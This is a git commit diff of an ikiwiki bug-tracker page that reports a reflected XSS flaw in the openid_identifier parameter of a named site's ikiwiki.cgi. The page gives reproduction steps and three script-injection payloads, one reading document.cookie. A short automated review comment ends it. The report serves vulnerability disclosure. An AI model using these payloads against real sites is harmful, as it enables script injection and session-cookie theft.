path: root/doc/bugs/XSS_Alert...__33____33____33__.mdwn
author: http://smcv.pseudorandom.co.uk/ <smcv@web> 2015-03-30 06:56:25 -0400
committer: admin <admin@branchable.com> 2015-03-30 06:56:25 -0400
commit: 7da5085589208573b16afd8a9516cffede43e18c
tree: c004d3794d20ce982590719cd7f14497d669a8ab /doc/bugs/XSS_Alert...__33____33____33__.mdwn
parent: c68c044d8743d83ae5a845a2c800a3b03a7d7350
fix formatting
Diffstat (limited to 'doc/bugs/XSS_Alert...__33____33____33__.mdwn')
-rw-r--r-- doc/bugs/XSS_Alert...__33____33____33__.mdwn 8
1 files changed, 5 insertions, 3 deletions
diff --git a/doc/bugs/XSS_Alert...__33____33____33__.mdwn b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
index 436e3faae..2c147073a 100644
--- a/doc/bugs/XSS_Alert...__33____33____33__.mdwn
+++ b/doc/bugs/XSS_Alert...__33____33____33__.mdwn
@@ -5,14 +5,16 @@ Vulnerable Links:
webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
How To Reproduce The Vulnerability :
+
1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
3. forward the request
XSS Payload :
-1. "></script><script>prompt(909043)</script>
-2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
-3. "></script><script>prompt(document.cookie)</script>
+
+1. `"></script><script>prompt(909043)</script>`
+2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
+3. `"></script><script>prompt(document.cookie)</script>`
NOTE : Proof of concept is attached.
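Review bot: The URL under "Vulnerable Links:" and in step 1 is still bare text while the three payload lines are now code-quoted; wrapping `webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1` in backticks as well would keep the whole report rendered literally and in one style. Step 2 still reads "brup suite", which could be corrected to "Burp Suite" in the same formatting pass. The commit message "fix formatting" would also be more useful to later readers if it said that the payloads were quoted so that the wiki displays them as text.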